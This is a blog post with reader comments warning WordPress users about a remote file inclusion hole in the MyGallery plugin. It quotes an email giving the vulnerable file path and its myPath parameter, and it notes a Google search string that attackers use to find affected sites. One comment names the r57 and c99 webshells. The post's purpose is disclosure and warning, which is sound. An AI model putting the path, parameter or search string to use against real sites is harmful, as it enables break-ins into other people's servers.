MyGallery plugin–possible security issue?

EDIT: I highly recommend to any user, to either remove this script until a fix can be made. The file that is being affected and used is /mygallerybrowser.php?. The creator (page translated from German to English) of the plugin updated today and said to upgrade to the latest version, or deactivate the plugin.

Earlier today I received an e-mail from “WaLhEZ” as follows:

Hi, i am visit you site, and see the problem with and I have seen that you have bug that even allows that somebody ill-disposed one can enter your host and provocate damage, obtaining pass of your FTP, dates base… etc the problem this in plugin mygallery, specifically in the file mygallerybrowser.php. This it is an example of as they can enter your servant and dañarte watches: wp-content/plugins/ mygallery/myfunctions /mygallerybrowser.php?myPath=(website)? And I communicate this to him, so that it fixes it, this bug I have discovered I to it, and I want to communicate it to it so that they are not going to him to damage his blog, that by the way this very pretty. I wait for its answer… And it pardons my English is not very good. Contacme and I see as I can help him.

Upon receiving his e-mail, I didn’t know whether it was hoax, as I knew I didn’t have MyGallery plugin activated, though I did have it under my /plugins/ directory. Though upon accessing it via the url he had included in his e-mail, I was able to go to the file under the directory, though with some PHP errors. I then went ahead and CHMODd the files so that they couldn’t be accessed, and then deleted it from my server since I’m not using it.

After deleting it I also went through my access logs and errors logs but didn’t see too much activity other then what matched his IP address and what matched my IP address in regards to the access URL and plugin directory. Though all day today I’ve had a lot of hits coming from google searches for “inurl:/mygallery/myfunctions” (and from various languages too like es, it,, and without the quotes. I’ve also had quite a bit of hits from a hacking forum, (the link is a direct link to the thread.) Unforutnately the only way to view what is on that forum is by registering and I believe it’s turned off. I didn’t run it through a translator, but I figured that’s what the message was saying.

I’m going to look more into this, but if you’re using this plugin, definitely keep an eye out. If you or someone else is using this plugin, feel free to link them to this entry. I’ll be updating it through the day(s) when I come across more information on the issue.


  1. Well, what is it, is the issue fixed or is it not fixed? Should be implies probability or expectation. So either you fixed the security issue, or it’s not fixed yet.

    Either way, I don’t plan on using this plugin.

  2. The issue *is* fixed. When you don´t plan to use the plugin, well then your blog entry ist much addo about nothing 😉

  3. This sort of thing is scary! My last site got hacked by some israeli or something! My host said it was my fault!

  4. [quote comment=”11233″]The issue *is* fixed. When you don´t plan to use the plugin, well then your blog entry ist much addo about nothing ;-)[/quote]

    You’ve got to be fucking kidding me. Please don’t come here if you’ve got nothing constructive to say. This blog post is pretty important considering that there will be a vast amount of users who are unaware that their plugin could cause their site to get hacked.

    Seriously, why don’t you take a look at the google search link I provided in my entry, and then we’ll see if this blog entry is “much addo about nothing.” Until then, gfy.

  5. is excellent of your part communicating to him to dema of this bug, and I was wanted it to communicate to other webmaster but the time short and single me hiso alcanze to desirtelo to you, that good that you have communicated east problem, and by the way you have blog very good. I had made you a patch momentary, but apparently already saldra another version of that plugin is far better. And another thing bug that undergoes plugin denominates RFI to him = remote file include, so that it allows that by means of the vulnerability that suffers it manages to obtain access to host using one webshell in this case r57 and c99. You already know to any doubt comunicamela that it will deal with ayudarte in which can. Greetings
    PD: one sees that you are very pretty

  6. ahh my mail is not “hoax”, you I have sent it personally so that I have seen bug and by ethics you I have communicated it
    PD: still I continue thinking that you are very pretty

Comments are closed.